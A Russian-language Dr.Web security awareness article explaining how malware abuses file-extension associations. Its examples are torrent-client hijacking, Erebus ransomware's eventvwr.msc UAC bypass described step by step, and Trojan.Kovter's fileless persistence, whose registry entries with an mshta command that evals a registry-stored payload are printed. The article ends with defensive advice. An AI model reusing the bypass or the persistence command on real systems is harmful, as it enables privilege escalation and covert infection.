Вы используете устаревший браузер!

Страница может отображаться некорректно.

Незваные гости

Незваные гости

Другие выпуски этой рубрики (39)
  • добавить в избранное
    Добавить в закладки

О расширениях – еще шире

Прочитали: 1880 Комментариев: 76 Рейтинг: 90

В выпуске «Три буквы после точки» мы рассказывали о том, как мошенники используют расширения файлов для обмана пользователей. Но в нем мы описали далеко не все возможности, которые расширения дают злоумышленникам.

Как мы уже упоминали, расширение ассоциируется операционной системой с определенными действиями, которые будут выполняться, если пользователь кликнет по файлу. К примеру, если это файл с расширением png, то, скорее всего, у вас запустится программа для просмотра или редактирования графических файлов. А что будет, если вы кликнете, скажем, по файлу с расширением .torrent?

Program.MediaGet устанавливает себя в качестве торрент-клиента по умолчанию, изменяя ассоциации .torrent файлов в реестре.

Program.Zona проверяет настройки ассоциаций с файлами .torrent и, в случае, если Zona не является программой по умолчанию для открытия торрент-файлов, предлагает ассоциировать себя с ними.

То есть, кликнув по ссылке, вы запустите вредоносную программу. Причем, скорее всего, еще и подтвердите запуск приложения, думая, что запускается торрент-клиент.

Система контроля запуска Windows, конечно, покажет, что запускается на самом деле, но, используя расширения, мошенники могут обойти и ее.

Метод обхода UAC заключается в следующем.

  1. Erebus копирует себя в системную папку как файл со случайным именем и затем вносит изменения в реестр Windows с целью подмены ассоциации для файлового расширения .msc и исполнения свежесозданного файла со случайным именем.
  2. Далее Erebus запускает файл eventvwr.exe (Просмотр событий), который автоматически открывает файл eventvwr.msc.
  3. Поскольку msc-файл больше не связан с mmc.exe (Консоль управления), то eventvwr.exe запустит файл вымогателя. Просмотр событий работает в режиме с повышенными правами, поэтому исполняемый файл будет иметь те же привилегии, что позволит обойти UAC.

https://twitter.com/malwrhunterteam/status/828957753121112064

Здесь используется тот факт, что ряд системных программ загружается сразу с повышенными правами, и вредоносные файлы запускаются вместо них либо в виде их расширений.

Как происходит ассоциация? Довольно просто. Вот, например, бестелесный Trojan.Kovter.297 регистрирует для себя файлы с нужным расширением и использует их как переключатели (триггеры) для своего запуска.

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"

Самое, пожалуй, безобидное, что вытворяют вирусописатели с расширениями, – это ассоциации созданных вредоносной программой файлов для уведомления жертв о необходимости выкупа.

Trojan.Encoder.12950 размещает в системе скрипт, который будет выводить сообщения с требованиями, и прописывает его в ассоциации для расширения *.dcry.

#Windows #вредоносное_ПО

Dr.Web рекомендует

  1. Система контроля запуска Windows отображает запросы на запуск любых приложений. Поэтому не забывайте держать ее включенной.
  2. Внимательно читайте сообщения системы контроля запуска, чтобы понимать, какой именно файл пытается запуститься.
  3. Используйте антивирус. Только он может отследить все пакости, задуманные злоумышленниками.

Получайте Dr.Web-ки за участие в проекте

Каждая активность = 1 Dr.Web-ка

Оцените выпуск

Сделайте репост

Поставьте «Нравится»

Чтобы получать награды надо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

10 Dr.Web-ок за комментарий в день выхода выпуска или 1 Dr.Web-ка в любой другой день. Комментарии публикуются автоматически и постмодерируются. Правила комментирования новостей «Доктор Веб».

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей


 
На страницу: